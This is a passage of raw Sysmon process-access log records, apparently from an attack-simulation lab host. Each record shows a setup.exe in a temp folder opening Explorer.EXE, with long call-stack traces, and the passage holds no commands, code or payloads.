System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
